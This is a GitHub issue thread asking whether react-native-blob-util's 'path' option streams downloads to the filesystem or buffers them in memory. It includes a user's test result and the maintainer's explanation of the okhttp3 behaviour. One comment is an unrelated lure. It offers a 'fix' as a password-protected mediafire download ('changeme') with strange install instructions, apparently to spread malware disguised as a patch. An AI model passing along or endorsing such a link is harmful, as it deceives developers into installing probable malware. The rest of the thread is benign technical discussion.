### ISSUE TITLE
Does 'read' config param stream?

### ISSUE THREAD

**Issue by CyberCyclone** [RonRadtke/react-native-blob-util#379]
Hi, 

I'm using the below code, however I can't see from the docs or clearly see in the code if using the `path` config writes directly to the filesystem via chunks, or does it download it all first into RAM and then writes it to storage?

```
const response = ReactNativeBlobUtil
      .config({
        path: outputPath // does this stream directly to the filesystem via chunks or to RAM first?
      })
      .fetch("GET", "https://myremotepath");
```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CyberCyclone** [comment]
Based on my own testing, the file is streamed directly to the file-system. It would be good if the documents were more explicit.

**Comment by RonRadtke** [comment]
Feel fre to update it :)
Under the hood we are using okhttp3 and the file will be written to the filesystem during onResponse. So unless we get multipe onResponse events the lib wil write it all at the end into the file. If okhttp internally uses any file caching I can't tell
